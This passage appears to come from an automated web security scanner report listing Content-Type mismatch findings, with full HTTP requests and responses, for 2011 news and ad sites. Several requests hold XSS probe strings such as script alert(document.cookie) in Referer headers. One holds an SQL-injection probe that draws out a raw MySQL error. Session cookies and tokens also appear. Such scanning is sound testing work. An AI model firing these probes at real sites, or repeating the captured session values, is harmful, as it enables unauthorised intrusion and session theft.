The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /aspdata/clients/herald/nhlgame.aspx?team=121 HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 28 Jan 2011 22:00:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1659

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

28.27. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Summary

Severity:   Information
Confidence:   Firm
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:59:18 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:59:18 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:04:18 GMT;path=/

GIF89a.............!.......,...........D..;

28.28. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Summary

Severity:   Information
Confidence:   Firm
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/8/2011+3:06:08+AM; z=4; sid=9ceb3417-a6c7-439a-a223-e9ad8d9afb02; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:42:58 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: z=4; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:42:57 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150145525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 00:47:58 GMT;path=/

GIF89a.............!.......,...........D..;

28.29. http://twitter.com/oexchange.xrd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /oexchange.xrd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain XML.

Request

GET /oexchange.xrd HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:37 GMT
Server: hi
Status: 200 OK
Last-Modified: Fri, 28 Jan 2011 02:36:34 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 760
Cache-Control: max-age=86400
Expires: Sat, 29 Jan 2011 14:25:34 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<?xml version='1.0' encoding='UTF-8'?>
<XRD xmlns='http://docs.oasis-open.org/ns/xri/xrd-1.0'>
<Subject>http://twitter.com</Subject>
<Property type='http://www.oexchange.org/spec/0.8/prop/vendor'>
...[SNIP]...

28.30. http://www.berkshireeagle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.berkshireeagle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.berkshireeagle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=NCGACERYMBIXOCUUCAWCFEY; UserID=NCGACERYMBIXOCUUCAWCFEY; fPage=true; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DNCGACERYMBIXOCUUCAWCFEY%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1296308397392%3BcVisit%3D1296308397392%3BinitRegType%3DVoluntary%3B; currBrandCheck=NeBer; UserType=Browser; s_cc=true; s_sq=%5B%5BB%5D%5D; __g_c=w%3A1%7Cb%3A2%7Cc%3A291148578685700%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=291148578685700_1_0.01_0_5_1296740401855; Zvents=x378593tx7; __qca=P0-1648436609-1296308432289

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 29 Jan 2011 13:40:51 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding

File not found.

28.31. http://www.bostonherald.com/home/includes/twitter.inc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /home/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /home/includes/twitter.inc HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 21:45:09 GMT
Accept-Ranges: bytes
Content-Length: 28395
Content-Type: text/plain; charset=UTF-8
Connection: close


            <!-- twitter_dynamic_content -->
               <p><a class="twitter_name sec_entertainment" href="http://twitter.com/BosHerald_Edge/" target="_new">BosHerald_Edge</a>: A foodie calendar for Bostonians: a
...[SNIP]...

28.32. http://www.bostonherald.com/projects/boston_pensions/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/boston_pensions/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /projects/boston_pensions/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:06:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 348


SQL:
SELECT a.* FROM `bostonPensioners20090312` a WHERE 1=1 ORDER BY ?1\'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
...[SNIP]...

28.33. http://www.bostonherald.com/track/includes/twitter.inc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /track/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /track/includes/twitter.inc HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/track/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; ebNewBandWidth_.www.bostonherald.com=1856%3A1296251858097; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.3.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 14:25:09 GMT
Accept-Ranges: bytes
Content-Length: 26322
Content-Type: text/plain; charset=UTF-8
Connection: close


            <!-- twitter_dynamic_content -->
               <p><a class="twitter_name sec_track" href="http://twitter.com/Trackgals/" target="_new">Track Gals</a>: Have you made your reservations for <a href="http://
...[SNIP]...

28.34. http://www.cbs6albany.com/images/logo.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cbs6albany.com
Path:   /images/logo.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/logo.gif HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:29 GMT
Server: Apache
Last-Modified: Fri, 17 Oct 2008 09:12:24 GMT
ETag: "1eb7d4d-41b7-4596f5d09ae00"
Accept-Ranges: bytes
Content-Length: 16823
Cache-Control: max-age=86400
Expires: Sat, 29 Jan 2011 17:37:29 GMT
Content-Type: image/gif

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................h....
...[SNIP]...

28.35. http://www.moxiesoft.com/tal_products/chat.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /tal_products/chat.aspx?ac=PPC.B.live chat HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 28 Jan 2011 13:59:24 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

28.36. http://www.paperg.com/jsfb/embed.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:00:05 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39271


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...

28.37. http://www.screenthumbs.com/tools/js/linkthumbs.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.screenthumbs.com
Path:   /tools/js/linkthumbs.js

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /tools/js/linkthumbs.js?key=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

var linkthumbs_url = 'http://www.screenthumbs.com/thumb?direct=1&appkey=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome&format=0&width=200&height=150&url=';

var linkthumbs_clsNames = ['', 'type2'];
...[SNIP]...

28.38. http://www.spicefactory.org/parsley/schema/2.2/parsley-core.xsd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.spicefactory.org
Path:   /parsley/schema/2.2/parsley-core.xsd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain XML.

Request

GET /parsley/schema/2.2/parsley-core.xsd HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:37 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
Last-Modified: Thu, 22 Apr 2010 08:02:16 GMT
ETag: "16005b-2f9a-4bd00288"
Accept-Ranges: bytes
Content-Length: 12186
Connection: close
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<xs:schema elementFormDefault="qualified"
xmlns="http://www.spicefactory.org/parsley"
xmlns:tns="http://www.spicefactory.org/parsley"
xmlns:xs="ht
...[SNIP]...

28.39. http://www.zvents.com/images/bd_bg.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zvents.com
Path:   /images/bd_bg.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/bd_bg.gif HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:45 GMT
Content-Type: image/gif
Content-Length: 181
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:45 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR...............F[...6PLTEtttjjjnnnqqqXXXaaacccYYYgggVVVTTTfff^^^UUU[[[uuu]]].....(....:IDAT8......0...........}$..0.V.J....fZ.4Q...J..z0.......jx.Z..2.v.....IEND.B`.

28.40. http://www.zvents.com/images/bg_searchbar.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zvents.com
Path:   /images/bg_searchbar.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/bg_searchbar.gif HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298899998236%26vn%3D1; s_invisit=true; c_m=Noneburpburp; cf=1; s_sq=%5B%5BB%5D%5D; __gads=ID=29529442f7375d88:T=1296308016:S=ALNI_MYQjVN2o43T_cMDeG0v0xQX8dOB-Q

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:45 GMT
Content-Type: image/gif
Content-Length: 216
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:45 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR...2...-......a.....HPLTE..O.....,..)....9.....M...../..6..A........F..D..3..%.."....~......    .w.+{<#...KIDATH......0..@.19..SV@...j,.?t..F.1hl.I...4v.C..(4&.S...5..[......%J.(...e.?
...[SNIP]...

28.41. http://www.zvents.com/images/zbutton.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zvents.com
Path:   /images/zbutton.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/zbutton.gif HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
